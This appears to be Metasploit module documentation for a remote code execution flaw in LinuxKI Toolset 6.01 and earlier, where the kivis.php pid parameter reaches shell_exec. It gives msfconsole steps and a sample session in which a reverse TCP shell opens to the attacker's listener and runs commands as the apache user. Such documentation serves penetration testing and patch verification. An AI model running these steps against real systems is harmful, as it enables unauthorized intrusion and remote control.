numanturle
48 lines
1.7 KiB
Markdown
48 lines
1.7 KiB
Markdown
## Description
|
|
|
|
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
|
|
|
|
|
## Vulnerable Application
|
|
LinuxKI Toolset <= 6.01
|
|
|
|
To test this application, you need to download the version 6.01 [here](https://github.com/HewlettPackard/LinuxKI/blob/v6.0-1/Dockerfile).
|
|
Do not forget to change [this URL](https://raw.githubusercontent.com/HewlettPackard/LinuxKI/master/rpms/linuxki-6.0-1.noarch.rpm) inside the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.0-1/rpms/linuxki-6.0-1.noarch.rpm).
|
|
|
|
|
|
## Verification Steps
|
|
|
|
1. Start `msfconsole`
|
|
2. `use exploit/linux/http/linuxki_rce`
|
|
3. `set RHOST <target_ip>`
|
|
4. `set RPORT <target_port>`
|
|
5. `set LHOST <your_ip>`
|
|
6. `set LPORT <your_port>`
|
|
7. Ideally run `check`
|
|
8. `set LHOST <your_ip>`
|
|
9. `set LPORT <your_port>`
|
|
10. Optional: `set TARGETURI <path_to_linuxki>` if target system uses a different path to LinuxKI
|
|
11. `exploit`
|
|
|
|
## Scenarios
|
|
### LinuxKI Toolset v6.01
|
|
|
|
```
|
|
msf5 > use exploit/linux/http/linuxki_rce
|
|
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
|
|
rhosts => 10.0.0.1
|
|
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
|
|
rport => 8080
|
|
msf5 exploit(linux/http/linuxki_rce) > check
|
|
[+] 10.0.0.1:8080 - The target is vulnerable.
|
|
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
|
|
lhost => 10.0.0.5
|
|
msf5 exploit(linux/http/linuxki_rce) > run
|
|
|
|
[*] Started reverse TCP handler on 10.0.0.5:4444
|
|
[*] Sending exploit...
|
|
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300
|
|
|
|
id
|
|
uid=48(apache) gid=48(apache) groups=48(apache)
|
|
``` |